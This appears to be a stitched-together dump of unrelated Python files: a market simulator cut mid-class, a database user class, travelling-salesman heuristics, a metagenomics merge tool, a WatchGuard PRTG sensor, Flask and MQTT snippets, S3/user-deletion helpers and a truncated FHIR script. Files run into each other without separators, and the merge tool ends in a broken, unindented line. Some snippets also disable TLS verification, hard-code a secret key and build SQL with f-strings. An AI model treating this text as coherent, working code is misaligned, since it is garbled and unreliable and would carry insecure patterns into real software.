        # BUG FIX: __init__ originally set `self.miu`, but set_prams(),
        # generate() and show_market() all read `self.mean` -- so `mean` was
        # undefined (AttributeError) until set_prams() supplied a non-None
        # value. Initialize the attribute the rest of the class actually uses.
        self.mean = None      # drift
        self.sigma = None     # volatility
        self.tick_num = None  # number of ticks per unit time

    def set_prams(self, s0, mean, sigma, tick_num):
        """Set simulation parameters; None leaves the current value unchanged.

        (Name kept as `set_prams` for backward compatibility with callers.)
        """
        if s0 is not None: self.s0 = s0
        if mean is not None: self.mean = mean
        if sigma is not None: self.sigma = sigma
        if tick_num is not None: self.tick_num = tick_num

    def generate(self):
        """Draw one-step simulated prices from s0.

        NOTE(review): sample count is hard-coded to 10000 regardless of
        tick_num -- confirm this is intended.
        """
        dt = 1.0 / self.tick_num
        s1 = self.s0 * np.exp(self.mean * dt +
                              self.sigma * np.sqrt(dt) *
                              np.random.standard_normal(10000))
        return s1

    def show_market(self):
        """Plot m simulated price paths over tick_num steps."""
        dt = 1.0 / self.tick_num
        m = 10  # target num
        s = np.zeros((self.tick_num + 1, m))
        s[0] = self.s0
        for t in range(1, self.tick_num + 1):
            # Each step multiplies the previous price by a lognormal factor.
            s[t] = s[t-1] * np.exp(self.mean * dt +
                                   self.sigma * np.sqrt(dt) *
                                   np.random.standard_normal(m))
        plt.plot(s[:, :], lw=1.5)
        plt.xlabel('time')
        plt.ylabel('price')
        plt.title('market simulation')
        plt.show()
def simulate():
    # Preview the simulated market, then (currently disabled) bot trading.
    app = MarketGenerator()
    app.set_prams(s0=3100, mean=0, sigma=0.3, tick_num=300)
    app.show_market()
    # NOTE(review): exit() makes everything below unreachable; the bot wiring
    # appears to be disabled scaffolding -- confirm before removing.
    exit()
    bot_manager = BotManager()
    # Trading pair; spread mode: arithmetic/geometric; spread amount;
    # maximum order count; funds per grid level.
    # bot_manager.add_grid_bot(symbol='BNBBUSD', price_mode='geometric', price_diff=0.01, max_order=40, fund_each=20)
    bot_manager.add_balance_bot(asset='AVAX', symbol='AVAXBUSD', multiple=0.35, diff=11)
    bot_manager.run_init()
    last_err_time = 0.0
    re_err_cnt = 0
|
import json

from .authenticators import authenticator
class DBUser(object):
    """A user row from the `users` table, plus its role names and auth info."""

    def __init__(self, db, username, name, email, flags=""):
        self.Username = username
        self.Name = name
        self.EMail = email
        self.Flags = flags          # flag characters; "a" marks an admin
        self.DB = db                # open DB connection used by save()/queries
        self.AuthInfo = {}          # type -> [secret,...] # DB representation
        self.RoleNames = None       # populated by get()/list(), else None

    def __str__(self):
        return "DBUser(%s, %s, %s, %s)" % (self.Username, self.Name, self.EMail, self.Flags)

    __repr__ = __str__

    def save(self, do_commit=True):
        # Upsert this user; auth_info is stored as JSON text (requires the
        # module-level `import json`).
        c = self.DB.cursor()
        auth_info = json.dumps(self.AuthInfo)
        c.execute("""
            insert into users(username, name, email, flags, auth_info) values(%s, %s, %s, %s, %s)
                on conflict(username)
                do update set name=%s, email=%s, flags=%s, auth_info=%s;
            """,
            (self.Username, self.Name, self.EMail, self.Flags, auth_info,
             self.Name, self.EMail, self.Flags, auth_info
            ))
        if do_commit:
            c.execute("commit")
        return self

    def authenticate(self, method, config, presented):
        # True only when the method exists, is enabled, and accepts `presented`.
        a = authenticator(method, config, self.AuthInfo.get(method))
        return a is not None and a.enabled() and a.authenticate(self.Username, presented)

    def set_auth_info(self, method, info):
        # info is in DB representation, e.g. unhashed password
        self.AuthInfo[method] = info

    def set_password(self, password):
        # for compatibility, password is DB representation, e.g. hashed
        self.set_auth_info("password", password)

    def auth_info(self, method):
        return self.AuthInfo.get(method)

    def auth_method_enabled(self, method, config):
        a = authenticator(method, config, self.AuthInfo.get(method))
        return a is not None and a.enabled()
        #return self.authenticator(method).enabled()

    @staticmethod
    def get(db, username):
        # Fetch a single user (with role names) or None when not found.
        c = db.cursor()
        c.execute("""select u.name, u.email, u.flags, u.auth_info, array(select ur.role_name from users_roles ur where ur.username=u.username)
                        from users u
                        where u.username=%s""",
                  (username,))
        tup = c.fetchone()
        if not tup: return None
        (name, email, flags, auth_info, roles) = tup
        u = DBUser(db, username, name, email, flags)
        u.AuthInfo = auth_info
        u.RoleNames = roles
        return u

    def is_admin(self):
        # Flags may be None; treat that as "no flags".
        return "a" in (self.Flags or "")

    @staticmethod
    def list(db):
        # Generator over all users (with role names); AuthInfo is not loaded.
        c = db.cursor()
        c.execute("""select u.username, u.name, u.email, u.flags, array(select ur.role_name from users_roles ur where ur.username=u.username)
                        from users u
                    """)
        for username, name, email, flags, roles in c.fetchall():
            u = DBUser(db, username, name, email, flags)
            u.RoleNames = roles
            #print("DBUser.list: yielding:", u)
            yield u
|
from Graph import *
from itertools import *
from time import *
## Hamilton path algorithms
def Brutal(G, latlong = True):
    """Return [cost, path] of the cheapest Hamiltonian cycle, found by
    trying EVERY permutation (exponential — only for tiny graphs)."""
    node_count = len(G.nodes)
    best_path = G.nodes
    best_cost = 0
    # Seed the bound with the cycle cost of the nodes in their stored order.
    for idx in range(node_count - 1):
        best_cost += G.distNodes(G.nodes[idx].ID, G.nodes[idx + 1].ID, latlong)
        if idx == node_count - 2:
            best_cost += G.distNodes(G.nodes[idx + 1].ID, G.nodes[0].ID, latlong)
    for candidate in permutations(G.nodes):
        cost = 0
        idx = 0
        promising = True
        # Accumulate edge costs, abandoning the candidate as soon as it
        # already exceeds the best cycle seen so far.
        while idx < node_count - 1 and promising:
            cost += G.distNodes(candidate[idx].ID, candidate[idx + 1].ID, latlong)
            if idx == node_count - 2:
                cost += G.distNodes(candidate[idx + 1].ID, candidate[0].ID, latlong)
            if cost > best_cost:
                promising = False
            idx += 1
        if cost < best_cost:
            best_cost = cost
            best_path = list(candidate)
    return [best_cost, best_path]
def Inser(G, latlong = True):
    """Approximate the Hamiltonian cycle by cheapest insertion: shuffle the
    nodes, then insert each one where it lengthens the tour the least."""
    remaining = G.nodes.copy()
    shuffle(remaining)
    node_count = len(G.nodes)
    # Degenerate graphs: nothing to optimise.
    if node_count < 2:
        return [0, G.nodes]
    if node_count == 2:
        return [2 * G.distNodes(G.nodes[0].ID, G.nodes[1].ID, latlong), G.nodes]
    path = [remaining.pop(), remaining.pop()]
    while remaining:
        node = remaining.pop()
        size = len(path)
        # Default candidate: append at the end (inserting on the closing edge).
        best_index = size
        best_detour = (G.distNodes(path[-1].ID, node.ID, latlong)
                       + G.distNodes(node.ID, path[0].ID, latlong)
                       - G.distNodes(path[-1].ID, path[0].ID, latlong))
        for pos in range(size - 1):
            detour = (G.distNodes(path[pos].ID, node.ID, latlong)
                      + G.distNodes(node.ID, path[pos + 1].ID, latlong)
                      - G.distNodes(path[pos].ID, path[pos + 1].ID, latlong))
            if detour < best_detour:
                best_detour = detour
                best_index = pos + 1
        path.insert(best_index, node)
    # Total cycle cost, including the edge closing the tour.
    total = 0
    for pos in range(node_count - 1):
        total += G.distNodes(path[pos].ID, path[pos + 1].ID, latlong)
        if pos == node_count - 2:
            total += G.distNodes(path[pos + 1].ID, path[0].ID, latlong)
    return [total, path]
def Nearest(G, latlong = True):
    """Approximate the Hamiltonian cycle with the nearest-neighbour heuristic.

    Starts from a random node (the pool is shuffled) and repeatedly appends
    the closest not-yet-visited node. Returns [cost, path].
    """
    # Renamed from `list`: the original shadowed the builtin.
    remaining = G.nodes.copy()
    shuffle(remaining)
    n = len(G.nodes)
    cost = 0
    # Degenerate graphs: nothing to optimise.
    if (n < 2):
        return [0, G.nodes]
    if (n == 2):
        return [2 * G.distNodes(G.nodes[0].ID, G.nodes[1].ID, latlong), G.nodes]
    path = [remaining.pop()]
    while (remaining):
        m = len(remaining)
        nearest_idx = 0
        MinDist = G.distNodes(path[-1].ID, remaining[0].ID, latlong)
        for k in range (m):
            dist = G.distNodes(path[-1].ID, remaining[k].ID, latlong)
            if (dist < MinDist):
                MinDist = dist
                nearest_idx = k
        path.append(remaining.pop(nearest_idx))
        cost += MinDist
    # Close the cycle back to the start node.
    cost += G.distNodes(path[-1].ID, path[0].ID, latlong)
    return [cost, path]
def H2opt(G, Hamilton, latlong = True):
    """Improve a Hamiltonian cycle with 2-opt edge swaps.

    Repeatedly reverses path segments while that shortens the cycle,
    stopping at a local optimum or after `limit` full sweeps.
    Returns [cost, path] like the construction heuristics.
    """
    def Swap2opt(path, k, l):
        # Reverse the segment between the removed edges (k,k+1) and (l,l+1).
        if (l == 0):
            middle = path[k+2 :]
            middle.reverse()
            # BUGFIX: the original concatenated bare node objects with lists
            # (`path[k+1] + ... + path[0] + ...`), raising TypeError; the
            # endpoints must be wrapped in single-element lists.
            path = [path[k+1]] + path[1 : k+1] + [path[0]] + middle
            return path
        middle = path[k+1 : l+1]
        middle.reverse()
        path = path[: k+1] + middle + path[l+1 :]
        return path
    n = len(Hamilton)
    z = 0
    comp = 0          # number of swaps applied (diagnostic counter)
    limit = 100       # safety cap on full improvement sweeps
    better = True
    while (better) and (z < limit):
        z += 1
        better = False
        for i in range (n):
            for j in range(n):
                # Skip identical and adjacent edges: swapping them is a no-op.
                if (j < i-1) or (j > i+1):
                    k = min(i, j)
                    l = max(i, j)
                    a = k
                    b = k+1
                    c = l
                    d = l+1
                    if (l == n-1):
                        d = 0            # closing edge wraps to the start
                    if (G.distNodes(Hamilton[a].ID, Hamilton[b].ID , latlong) + G.distNodes(Hamilton[c].ID, Hamilton[d].ID , latlong) > G.distNodes(Hamilton[a].ID, Hamilton[c].ID , latlong) + G.distNodes(Hamilton[b].ID, Hamilton[d].ID , latlong)):
                        Hamilton = Swap2opt(Hamilton, k, l)
                        better = True
                        comp +=1
    # Total cycle cost of the (locally) optimised tour.
    cost = 0
    for k in range (n-1):
        cost += G.distNodes(Hamilton[k].ID, Hamilton[k+1].ID, latlong)
        if (k == n-2):
            cost += G.distNodes(Hamilton[k+1].ID, Hamilton[0].ID, latlong)
    return [cost, Hamilton]
def Prim (G, latlong=True): #maybe optimize
    """Return the parent array of a minimum spanning tree (Prim's algorithm).

    Node indices are used directly as IDs for G.distNodes. Keys of -1 act
    as +infinity; node 0 is the root (its own parent).
    """
    def infto(x, y):
        # "Infinity-aware" less-than: -1 encodes +infinity.
        if (x == -1):
            return False
        if (y == -1):
            return True
        return (x < y)
    def extracter(P, Key):
        # Pop and return the pending node with the smallest key.
        n = len(P)
        indexmin = 0
        # Renamed from `min`: the original shadowed the builtin.
        smallest = Key[P[0]]
        for i in range (n):
            if (infto(Key[P[i]], smallest)):
                smallest = Key[P[i]]
                indexmin = i
        ret = P[indexmin]
        del P[indexmin]
        return ret
    n = len(G.nodes)
    Key = [-1 for k in range (n)]
    Father = [-1 for k in range (n)]
    P = [k for k in range (n)]
    Key[0] = 0
    Father[0] = 0
    while (P):
        x = extracter(P, Key)
        for y in range (n):
            # Simplified: `y in P` replaces the hand-rolled linear `inp` helper.
            if (y != x) and (y in P) and infto(G.distNodes(x, y, latlong), Key[y]):
                Key[y] = G.distNodes(x, y, latlong)
                Father[y] = x
    return Father
def Christofides(G, latlong = True):
    """Start of a Christofides-style construction (INCOMPLETE).

    Only builds the MST via Prim and tallies node degrees; the matching,
    Euler tour and shortcutting steps are not implemented, and nothing
    is returned yet.
    """
    n = len(G.nodes)
    #ACM obtained with Prim algorithm
    tree = Prim(G, latlong)
    #deg of the tree
    # NOTE(review): every node starts at 1 and the root at -1, then each
    # node's parent gets +1 — presumably this counts tree degrees with an
    # offset for the self-parented root; confirm the intended semantics.
    deg = [1 for k in range (n)]
    deg[0] = -1
    for k in range (n):
        deg[tree[k]] += 1
    #print (deg)
## Tests
if __name__ == '__main__':
    # Shared 100-node random graph used by the manual tests below.
    # NOTE(review): `plt` and `shuffle` are not imported in this file —
    # presumably re-exported by `from Graph import *`; confirm.
    Rand = Graph("rand")
    Rand.buildRandomGraph(100)
    def TestBrutal():
        # Exhaustive search; only feasible on small graphs.
        c = Brutal(Rand, False)
        Rand.hamilton = c[1]
        Rand.show(False)
    def TestInser():
        c = Inser(Rand, False)
        Rand.hamilton = c[1]
        Rand.show(False)
    def TestNearest():
        c = Nearest(Rand, False)
        Rand.hamilton = c[1]
        Rand.show(False)
    def Test2opt():
        # 2-opt refinement seeded with the insertion heuristic.
        c = H2opt(Rand, Inser(Rand, False)[1], False)
        Rand.hamilton = c[1]
        Rand.show(False)
    def plotPrim(G):
        """Draw the minimum spanning tree returned by Prim()."""
        tree = Prim(G, False)
        n = len(tree)
        def Correcter(position):
            """swap the latitude and the longitude"""
            X = position[1]
            Y = position[0]
            return [X,Y]
        def DrawBranch(node1,node2, color, width):
            """draw a branch of the tree"""
            if (node1.ID != node2.ID):
                coordstart = Correcter(node1.position)
                coordstop = Correcter(node2.position)
                plt.plot([coordstart[0],coordstop[0]], [coordstart[1],coordstop[1]], linewidth = width, color=color)
        for k in range (n):
            DrawBranch(G.nodes[tree[k]], G.nodes[k], color='red', width=1)
        plt.show()
    def TestPrim():
        plotPrim(Rand)
        Christofides(Rand, False)
    def PerfGraphics(nbrNodes, nbtest = 100):
        """Calculates the average time of calculation of the hamilton path and it's length and draws curves.
        It will test graphs from one node to nbrNodes nodes.
        For each number of node the test his repeated nbtest times to obtain an average."""
        Nodes = []
        #Brutal
        ATbrutal = []
        ADbrutal = []
        #Inser
        ATinser = []
        ADinser = []
        #Nearest
        ATnearest = []
        ADnearest = []
        #2opt
        AT2opt = []
        AD2opt = []
        #2opt + Inser
        AT2optI = []
        AD2optI = []
        #2opt + Nearest
        AT2optN = []
        AD2optN = []
        for n in range (2, nbrNodes+1):
            Nodes.append(n)
            print(n)
            # Average Time and Average Distance for every algorithms
            tbrutal = 0
            dbrutal = 0
            tinser = 0
            dinser = 0
            tnearest = 0
            dnearest = 0
            t2opt = 0
            d2opt = 0
            t2optI = 0
            d2optI = 0
            t2optN = 0
            d2optN = 0
            for k in range (nbtest):
                # Fresh random graph per repetition to average out instance noise.
                Rand = Graph("rand")
                Rand.buildRandomGraph(n)
                #Brutal
                if (n < 8): #too long
                    av = time()
                    brutal = Brutal(Rand, False)
                    ap = time()
                    tbrutal += ap-av
                    dbrutal += brutal[0]
                #Inser
                av = time()
                inser = Inser(Rand, False)
                ap = time()
                tinser += ap-av
                dinser += inser[0]
                #Nearest
                av = time()
                nearest = Nearest(Rand, False)
                ap = time()
                tnearest += ap-av
                dnearest += nearest[0]
                #2opt
                av = time()
                h2opt = H2opt(Rand, Rand.nodes, False)
                ap = time()
                t2opt += ap-av
                d2opt += h2opt[0]
                #2opt + Inser
                av = time()
                h2optI = H2opt(Rand, Inser(Rand, False)[1], False)
                ap = time()
                t2optI += ap-av
                d2optI += h2optI[0]
                #2opt + Nearest
                av = time()
                h2optN = H2opt(Rand, Nearest(Rand, False)[1], False)
                ap = time()
                t2optN += ap-av
                d2optN += h2optN[0]
            #Brutal
            if (n < 8):
                ATbrutal.append(tbrutal/nbtest)
                ADbrutal.append(dbrutal/nbtest)
            #Inser
            ATinser.append(tinser/nbtest)
            ADinser.append(dinser/nbtest)
            #Nearest
            ATnearest.append(tnearest/nbtest)
            ADnearest.append(dnearest/nbtest)
            #2opt
            AT2opt.append(t2opt/nbtest)
            AD2opt.append(d2opt/nbtest)
            #2opt + Inser
            AT2optI.append(t2optI/nbtest)
            AD2optI.append(d2optI/nbtest)
            #2opt + Nearest
            AT2optN.append(t2optN/nbtest)
            AD2optN.append(d2optN/nbtest)
        # Top panel: average runtime per algorithm (log scale).
        plt.subplot(211)
        plt.yscale('log')
        plt.plot(Nodes[: len(ATbrutal)], ATbrutal, label='Brutal')
        plt.plot(Nodes,ATinser, label='Inser')
        plt.plot(Nodes,ATnearest, label='Nearest')
        plt.plot(Nodes,AT2opt, label='2opt')
        plt.plot(Nodes,AT2optI, label='2opt + Inser')
        plt.plot(Nodes,AT2optN, label='2opt + Nearest')
        plt.xlabel('Number of Nodes')
        plt.ylabel('Time (in seconds)')
        plt.legend()
        plt.title('Average time to find an hamilton path for each algorithm')
        # Bottom panel: average tour length per algorithm.
        plt.subplot(212)
        plt.plot(Nodes[: len(ADbrutal)], ADbrutal, label='Brutal')
        plt.plot(Nodes,ADinser, label='Inser')
        plt.plot(Nodes,ADnearest, label='Nearest')
        plt.plot(Nodes,AD2opt, label='2opt')
        plt.plot(Nodes,AD2optI, label='2opt + Inser')
        plt.plot(Nodes,AD2optN, label='2opt + Nearest')
        plt.xlabel('Number of Nodes')
        plt.ylabel('Length (in meters)')
        plt.legend()
        plt.title('Average length of an hamilton path for each algorithm')
        plt.savefig("Graphique de performance : (" + str(nbrNodes) + ", " + str(nbtest) + ")")
        plt.show()
    def TestsHamilton():
        # Toggle the individual tests by (un)commenting.
        #TestBrutal()
        #TestInser()
        #TestNearest()
        #Test2opt()
        TestPrim()
        #PerfGraphics(50,1000) #extremely long if the values are over (60,10)
    c = 1
    TestsHamilton()
#!/usr/bin/env python
import os
import sys
import json
from argparse import ArgumentParser
from mglib import merge_biom, AUTH_LIST, VERSION, safe_print
prehelp = """
NAME
mg-tab-merge
VERSION
%s
SYNOPSIS
mg-biom-merge [ --help --retain_dup_ids ] biom1 biom2 [ biom3 biom4 ... ]
DESCRIPTION
Tool to merge two or more profiles in tab format (output from mg-biom2tag)
"""
posthelp = """
Input
Two or more profile files in tab format
Output
Merged tab to stdout
EXAMPLES
mg-tab-merge --help
SEE ALSO
-
AUTHORS
%s
"""
def main(args):
    """Merge two or more tab-format subsystem profiles and print the merged
    table (up to --level subsystem levels) to stdout.

    Returns 0 on success, 1 on invalid input.
    """
    # Monkey-patch argparse so the raw pre/post help text is printed verbatim.
    ArgumentParser.format_description = lambda self, formatter: self.description
    ArgumentParser.format_epilog = lambda self, formatter: self.epilog
    parser = ArgumentParser(usage='', description=prehelp%VERSION, epilog=posthelp%AUTH_LIST)
    parser.add_argument('profiles', metavar='N', type=str, nargs='+',
                        help='list of profiles in json')
    parser.add_argument("--level", dest="level", type=int , default=3 , choices=[1,2,3,4] , help="print up to level")
    parser.add_argument("--evalue", dest="evalue", type=int , default=0 , help="filter rows for < evalue")
    parser.add_argument("--percent-identity", dest="percent_identity", type=float , default=0 , help="filter rows > percent identity")
    # NOTE(review): --retain_dup_ids is parsed but never used below — confirm.
    parser.add_argument("--retain_dup_ids", dest="retain_dups", action="store_true", default=False, help="append input number to duplicate input ID's rather than discarding duplicates, default is false")

    # get inputs
    opts = parser.parse_args()
    # BUGFIX: validate the parsed profile list, not `args` (sys.argv), which
    # also counts the script name and options.
    if len(opts.profiles) < 2:
        sys.stderr.write("ERROR: must have at least 2 file inputs\n")
        return 1
    for f in opts.profiles :
        if not os.path.isfile(f):
            # BUGFIX: the original never interpolated the filename into the message.
            sys.stderr.write("ERROR: %s is not a valid file\n" % f)
            return 1

    header = []
    # Nested dict: level1 -> level2 -> level3 -> level4 -> per-profile counts.
    subsystem2abundance = {}
    column = 0
    # evalues are given as positive exponents; flip sign once for comparison.
    if opts.evalue > 0 :
        opts.evalue = opts.evalue * (-1)
    level = opts.level
    for profile in opts.profiles :
        header.append(profile)
        with open(profile, 'r') as p :
            for line in p :
                row = line.strip().split("\t")
                # get subsystem levels - not generic
                levels = row[5:9]
                # Row filters: evalue (col 2) and percent identity (col 3).
                if float(row[2]) > opts.evalue :
                    continue
                if float(row[3]) < opts.percent_identity :
                    continue
                if levels[0] not in subsystem2abundance :
                    subsystem2abundance[levels[0]] = {}
                if levels[1] not in subsystem2abundance[levels[0]] :
                    subsystem2abundance[levels[0]][levels[1]] = {}
                if levels[2] not in subsystem2abundance[levels[0]][levels[1]] :
                    subsystem2abundance[levels[0]][levels[1]][levels[2]] = {}
                if levels[3] not in subsystem2abundance[levels[0]][levels[1]][levels[2]] :
                    subsystem2abundance[levels[0]][levels[1]][levels[2]][levels[3]] = [0 for x in range( len(opts.profiles) )]
                subsystem2abundance[levels[0]][levels[1]][levels[2]][levels[3]][column] += int(row[1])
        column += 1

    # print: header row is the level numbers followed by the profile names.
    ss_header = [str(x + 1) for x in range(level)]
    print( "\t".join( ss_header + header))
    for l1 in subsystem2abundance :
        l1_abundances = [0 for x in range( len(opts.profiles) )]
        for l2 in subsystem2abundance[l1] :
            l2_abundances = [0 for x in range( len(opts.profiles) )]
            for l3 in subsystem2abundance[l1][l2] :
                l3_abundances = [0 for x in range( len(opts.profiles) )]
                for l4 in subsystem2abundance[l1][l2][l3] :
                    if level == 4 :
                        print( "\t".join(
                                map(
                                    lambda x : str(x),
                                    [l1, l2, l3 , l4] + subsystem2abundance[l1][l2][l3][l4]
                                    )
                                )
                            )
                    else :
                        # Roll level-4 counts up into level 3.
                        for col , value in enumerate(subsystem2abundance[l1][l2][l3][l4]) :
                            l3_abundances[col] += value
                # print up to level3
                if level == 3 :
                    print( "\t".join(
                            map(
                                lambda x : str(x),
                                [l1, l2, l3] + l3_abundances
                                )
                            )
                        )
                else :
                    for col , value in enumerate(l3_abundances) :
                        l2_abundances[col] += value
            if level == 2 :
                print( "\t".join(
                        map(
                            lambda x : str(x),
                            [l1, l2] + l2_abundances
                            )
                        )
                    )
            else :
                for col , value in enumerate(l2_abundances) :
                    l1_abundances[col] += value
        if level == 1 :
            print( "\t".join(
                    map(
                        lambda x : str(x),
                        [l1] + l1_abundances
                        )
                    )
                )
    return 0
if __name__ == "__main__":
sys.exit(main(sys.argv))
|
import urllib
import http.cookiejar
import ssl
import xml.etree.ElementTree as ET
import json
import argparse
from paepy.ChannelDefinition import CustomSensorResult
# PRTG custom sensor: log in to a WatchGuard Firebox and report the status
# of its enabled External (WAN) interfaces.
parser = argparse.ArgumentParser()
parser.add_argument("prtg", help="PRTG String")
args = parser.parse_args()

# The firebox uses a self-signed certificate, so TLS verification is disabled.
context = ssl.create_default_context()
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE

cookiejar = http.cookiejar.CookieJar()
cookiejar.clear_session_cookies()
opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cookiejar),
                                     urllib.request.HTTPSHandler(context=context))

parameters = json.loads(args.prtg)
host = parameters.get('host')
user = parameters.get('linuxloginusername')
password = parameters.get('linuxloginpassword')

baseURL = 'https://' + host + ':8080'

# --- agent login (XML-RPC) ------------------------------------------------
url = baseURL + '/agent/login'
data = '<methodCall><methodName>login</methodName><params><param><value><struct><member><name>password</name><value><string>' + password + '</string></value></member><member><name>user</name><value><string>' + user + '</string></value></member><member><name>domain</name><value><string>Firebox-DB</string></value></member><member><name>uitype</name><value><string>2</string></value></member></struct></value></param></params></methodCall>'
req = urllib.request.Request(url, data.encode('utf-8'))
response = opener.open(req)
xmlUserInformation = response.read()
root = ET.fromstring(xmlUserInformation)
# NOTE(review): positional indexing into the XML-RPC response is fragile —
# confirm against the firebox firmware version in use.
sid = root[0][0][0][0][0][1].text
csrfToken = root[0][0][0][0][1][1].text

# --- web session login ----------------------------------------------------
url = baseURL + '/auth/login'
values = [('username', user),
          ('password', password),
          ('domain', 'Firebox-DB'),
          ('sid', sid),
          ('privilege', 1),
          ('from_page', '/')]
data = urllib.parse.urlencode(values)
req = urllib.request.Request(url=url, data=data.encode('utf-8'))
response = opener.open(req)

# --- fetch and parse the interface list -----------------------------------
url = baseURL + '/dashboard/dboard_get_interfaces?id=undefined'
req = urllib.request.Request(url)
response = opener.open(req)
# Parse JSON
interfaces = json.loads(response.read().decode('utf8'))
xmlList = interfaces.get('interface_list')
# Parse XML. `root_elem` renamed from `list` (shadowed the builtin);
# Element.getchildren() was removed in Python 3.9, so iterate with list().
root_elem = ET.fromstring(xmlList)
if list(root_elem)[0].tag == 'cluster':
    # On clusters the interface data sits under cluster/aggregate.
    root_elem = root_elem.find('cluster').find('aggregate')
# BUGFIX: the original performed this lookup twice on consecutive lines.
list_interfaces = root_elem.find('network').find('interface_list')

count_external_interfaces = 0
failed_interfaces = []
for interface in list(list_interfaces):
    if interface.find('enabled').text == '1' and interface.find('zone').text == 'External':
        count_external_interfaces += 1
        if interface.find('wan_target_status').text == '0':
            failed_interfaces.append(interface.find('ifalias').text)

message = 'WAN Status: Error'
status = 2
# BUGFIX: `is 0` compared object identity, not value; use == for equality.
if len(failed_interfaces) == 0:
    message = 'OK'
    status = 0

sensor = CustomSensorResult(message)
sensor.add_channel(channel_name="Status", unit="Count", value=status, is_limit_mode=True, limit_max_error=0.5,
                   limit_error_msg="At least one WAN is not available!", primary_channel=True)
sensor.add_channel(channel_name="Number of failed interfaces", unit="Count", value=len(failed_interfaces),
                   is_limit_mode=True, limit_max_error=0.5)
print(sensor.get_json_result())
|
# To access instance/class variables from Robot Framework, the file name must match the class name
class variable_file_class:
    """Robot Framework variable file exposing one class and one instance variable."""
    class_val = 'python'          # class-level variable visible to Robot tests
    def __init__(self):
        self.instance_val = 'self val'
# Pre-built instance so Robot can read instance variables without constructing one.
instance_from_class = variable_file_class()
class diff_variable_file:
    """Class whose name differs from the file name — used to contrast visibility
    with variable_file_class in Robot Framework."""
    diff_class_val = 'diff class'
    def __init__(self):
        self.diff_instance_val = 'self diff val'
|
class Config(object):
    """Base Flask configuration shared by all environments."""
    DEBUG = False
    TESTING = False
    # NOTE(review): the secret key, Mongo URI and upload path are hard-coded;
    # move them to environment variables before deploying.
    SECRET_KEY = "B\xb2?.\xdf\x9f\xa7m\xf8\x8a%,\xf7\xc4\xfa\x91"
    MONGO_URI="mongodb://localhost:27017/test"
    IMAGE_UPLOADS = "/home/username/projects/my_app/app/static/images/uploads"
    SESSION_COOKIE_SECURE = False
class ProductionConfig(Config):
    """Production settings: secure cookies, DB name split out of the URI."""
    DEBUG = False
    MONGO_URI="mongodb://localhost:27017/"
    DB_NAME="test"
    IMAGE_UPLOADS = "/home/username/projects/my_app/app/static/images/uploads"
    SESSION_COOKIE_SECURE = True
class DevelopmentConfig(Config):
    """Development settings: debug on, insecure cookies for local HTTP."""
    DEBUG = True
    MONGO_URI="mongodb://localhost:27017/"
    DB_NAME="test"
    IMAGE_UPLOADS = "/home/username/projects/my_app/app/static/images/uploads"
    SESSION_COOKIE_SECURE = False
class TestingConfig(Config):
    """Test settings: TESTING flag enabled, same local test database."""
    TESTING = True
    MONGO_URI="mongodb://localhost:27017/test"
    IMAGE_UPLOADS = "/home/username/projects/my_app/app/static/images/uploads"
    SESSION_COOKIE_SECURE = False
import paho.mqtt.client as mqtt
import json
import time
# NOTE(review): broker_url is empty — client.connect("") will fail until a
# broker address is configured.
broker_url = ""
broker_port = 1883
client = mqtt.Client()
client.connect(broker_url, broker_port)
# 4x4 dummy "image" and a sparse angle->reading map standing in for lidar data.
image = [[1, 2, 3, 4], [2, 3, 4, 1], [3, 4, 1, 2], [4, 1, 2, 3]]
dictionary = {0: 10.3, 100: 40.5, 200: 51.2, 300: 91.2, 359: 2.0}
# Serialize payloads as JSON; the hq camera sends the image rows reversed.
wheel_payload = json.dumps(image)
hq_payload = json.dumps(image[::-1])
lidar_payload = json.dumps(dictionary)
# Publish each payload on its own topic, one second apart.
client.publish(topic="wheel_cam", payload=wheel_payload, qos=0, retain=False)
time.sleep(1)
client.publish(topic="hq_cam", payload=hq_payload, qos=0, retain=False)
time.sleep(1)
client.publish(topic="lidar", payload=lidar_payload, qos=0, retain=False)
|
import os.path
import shutil
def publish_api(output_dir):
    """Delete output_dir (recursively) when it exists, then report success.

    Note: "succeeded" is printed whether or not the directory existed.
    """
    target_exists = os.path.exists(output_dir)
    if target_exists:
        shutil.rmtree(output_dir)
    print("succeeded")
|
import os
from datetime import datetime, timedelta
import boto3
from app import db, bucket
from app.models import Event
def delete_user(u):
    """Delete a user and every dependent row (highlights, topics, tags,
    articles, approved senders, comms), clearing join tables first so no
    foreign-key references remain. Commits once at the end.

    NOTE(review): the join-table deletes interpolate ids via f-strings;
    the ids come from ORM rows (integers), but parameterized queries would
    still be safer.
    """
    highlights=u.highlights.all()
    topics = u.topics.all()
    articles = u.articles.all()
    tags = u.tags.all()
    senders = u.approved_senders.all()
    comms = u.comms
    for h in highlights:
        db.session.execute(f'DELETE from highlights_topics where highlight_id={h.id}')
        db.session.execute(f'DELETE from tags_highlights where highlight_id={h.id}')
        db.session.delete(h)
    for t in topics:
        db.session.execute(f'DELETE from highlights_topics where topic_id={t.id}')
        db.session.execute(f'DELETE from tags_topics where topic_id={t.id}')
        db.session.delete(t)
    for t in tags:
        db.session.execute(f'DELETE from tags_articles where tag_id={t.id}')
        db.session.execute(f'DELETE from tags_highlights where tag_id={t.id}')
        db.session.execute(f'DELETE from tags_topics where tag_id={t.id}')
        db.session.delete(t)
    for a in articles:
        db.session.execute(f'DELETE from tags_articles where article_id={a.id}')
        db.session.delete(a)
    for s in senders:
        db.session.delete(s)
    db.session.delete(comms)
    db.session.delete(u)
    db.session.commit()
def check_for_delete():
    """Purge S3 files for accounts whose 'deleted account' event is >= 8 days old."""
    print('Checking if anything needs deleting from Amazon.')
    cutoff = datetime.utcnow() - timedelta(days=8)
    events = Event.query.filter(Event.name == 'deleted account', Event.date <= cutoff).all()
    if not events:
        print('nothing needs deletion')
        return
    for event in events:
        if event.user:
            print(f'deleting files for user {event.user.id}')
            delete_az(event.user)
        else:
            print('NoneType User')
def delete_az(user):
    """Delete every S3 object under the user's prefix (staging/ prefix in DEV)."""
    if os.environ.get('DEV'):
        az_path_base = f'staging/{user.id}/'
    else:
        az_path_base = f'{user.id}/'
    # `az`/`buck` naming suggests Azure, but this is boto3/S3 (`bucket` comes
    # from the app module).
    az = boto3.resource('s3')
    buck = az.Bucket(bucket)
    buck.objects.filter(Prefix=az_path_base).delete()
|
import matplotlib.pyplot as plt
from fhir_parser import FHIR
# Count patients per marital status and show the distribution as a bar chart.
fhir = FHIR()
patients = fhir.get_all_patients()
marital_status = {}
for patient in patients:
    # str() normalises the status object (and None) into a dict key.
    if str(patient.marital_status) in marital_status:
        marital_status[str(patient.marital_status)] += 1
    else:
